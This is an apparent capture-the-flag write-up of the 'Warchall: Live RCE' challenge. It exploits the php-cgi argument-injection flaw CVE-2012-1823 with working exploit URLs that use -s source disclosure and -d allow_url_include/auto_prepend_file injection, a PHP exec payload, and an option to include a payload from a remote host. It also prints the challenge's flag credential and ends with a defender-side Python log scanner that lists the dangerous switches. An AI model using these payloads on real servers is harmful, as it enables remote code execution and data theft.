The specific vulnerability is CVE-2012-1823 (php-cgi RCE).
The behaviour being abused is that php-cgi treats a query string beginning with a dash as command-line options appended to its own arguments,
so a request such as index.php?-s
is equivalent to running /usr/bin/php53-cgi/php-cgi -f index.php -s on the server.
The output of php-cgi --help is as follows:
Usage: php-cgi [-q] [-h] [-s] [-v] [-i] [-f <file>]
       php-cgi <file> [args...]
  -a               Run interactively
  -b <address:port>|<port> Bind path for external FASTCGI server mode
  -C               Do not chdir to the script's directory
  -c <path>|<file> Look for php.ini file in this directory
  -n               No php.ini file will be used
  -d foo[=bar]     Define INI entry foo with value 'bar'
  -e               Generate extended information for debugger/profiler
  -f <file>        Parse <file>. Implies '-q'
  -h               This help
  -i               PHP information
  -l               Syntax check only (lint)
  -m               Show compiled in modules
  -q               Quiet-mode. Suppress HTTP header output.
  -s               Display colour syntax highlighted source.
  -v               Version number
  -w               Display source with stripped comments and whitespace.
  -z <file>        Load Zend extension <file>.
  -T <count>       Measure execution time of script repeated <count> times.
http://rce.warchall.net/?-s
This shows the source code of index.php.
One of the statements in it is: require '../config.php';
So the next step is to find a way to read that file.
The absolute path of index.php is /home/level/20_live_rce/www/index.php,
so the absolute path of ../config.php is /home/level/20_live_rce/config.php.
Now try to output the source of config.php.
The php-cgi option -d foo[=bar] defines an INI entry foo with the value 'bar', so two INI settings can be injected through the query string:
-d allow_url_include=on
-d auto_prepend_file=/tmp/2.php
Create /tmp/2.php with the following content:
<?php exec("cat /home/level/20_live_rce/config.php", $out); print_r($out); ?>
Submit the address (the /tmp/2.php here can be replaced with a file hosted on your own server, e.g. http://xxx.xxx/1.txt):
http://rce.warchall.net/?-dallow_url_include=On+-dauto_prepend_file=/tmp/2.php+-n
URL-encoded, this is:
http://rce.warchall.net/?-dallow_url_include%3DOn+-dauto_prepend_file%3D%2ftmp%2f2.php+-n
The response contains the source code of ../config.php:
Array Define (' Icanhazrce ', ' stronggard_6_3 '); [return icanhazrce; [
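Added here as a defender-side example, not part of the original writeup: a small Python scanner that applies the observation behind this exploit (the query string reaches php-cgi as argv only when it contains no literal '=', which is why the address above is URL-encoded) to constructed access-log lines and flags the -s, -d and -n switches used on this page. The log lines, client IPs and the RISKY_INI list are assumptions made for the example.

```python
import re
from urllib.parse import unquote
# Constructed sample access-log lines (not from the original page).
SAMPLE_LOG = """\
10.0.0.1 - - [10/May/2012:10:00:01 +0000] "GET /index.php?-s HTTP/1.1" 200 1234
10.0.0.2 - - [10/May/2012:10:00:02 +0000] "GET /?-dallow_url_include%3DOn+-dauto_prepend_file%3D%2ftmp%2f2.php+-n HTTP/1.1" 200 98
10.0.0.3 - - [10/May/2012:10:00:03 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
10.0.0.4 - - [10/May/2012:10:00:04 +0000] "GET /index.php?-d+allow_url_include%3d1 HTTP/1.1" 200 77
10.0.0.5 - - [10/May/2012:10:00:05 +0000] "GET /search.php?q=-s HTTP/1.1" 200 300
"""

# php-cgi switches worth alerting on when they arrive via the query string, and
# the INI keys whose override with -d is the usual route to code execution (assumed list).
DANGEROUS_OPTS = {"s", "d", "n", "c", "f", "w", "i"}
RISKY_INI = ("allow_url_include", "auto_prepend_file", "auto_append_file", "disable_functions")
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')


def analyze_query(raw_query):
    """Return the suspicious php-cgi switches found in one raw (still URL-encoded) query string."""
    # mod_cgi passes the query string to the CGI as argv only when it contains no
    # literal '=' (RFC 3875 "indexed" query); that is why the exploit encodes '=' as %3D.
    if "=" in raw_query:
        return []
    args = unquote(raw_query.replace("+", " ")).split()
    findings = []
    for i, arg in enumerate(args):
        if len(arg) < 2 or arg[0] != "-" or arg[1] not in DANGEROUS_OPTS:
            continue
        opt = arg[1]
        # The value may be glued to the switch (-dfoo=1) or be the next argument (-d foo=1).
        value = arg[2:] or (args[i + 1] if i + 1 < len(args) else "")
        if opt == "d":
            ini = next((k for k in RISKY_INI if k in value), None)
            findings.append(f"-d {ini}" if ini else "-d")
        else:
            findings.append(f"-{opt}")
    return findings


def scan_log(text):
    """Return (client_ip, request_target, findings) for each log line that looks like argument injection."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m or "?" not in m.group("target"):
            continue
        findings = analyze_query(m.group("target").split("?", 1)[1])
        if findings:
            hits.append((line.split()[0], m.group("target"), findings))
    return hits
```

Note that ?q=-s is deliberately not flagged: with a literal '=' present the query is passed in QUERY_STRING rather than argv, so matching on the raw string alone would produce false positives while missing the encoded form.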
Warchall: Live RCE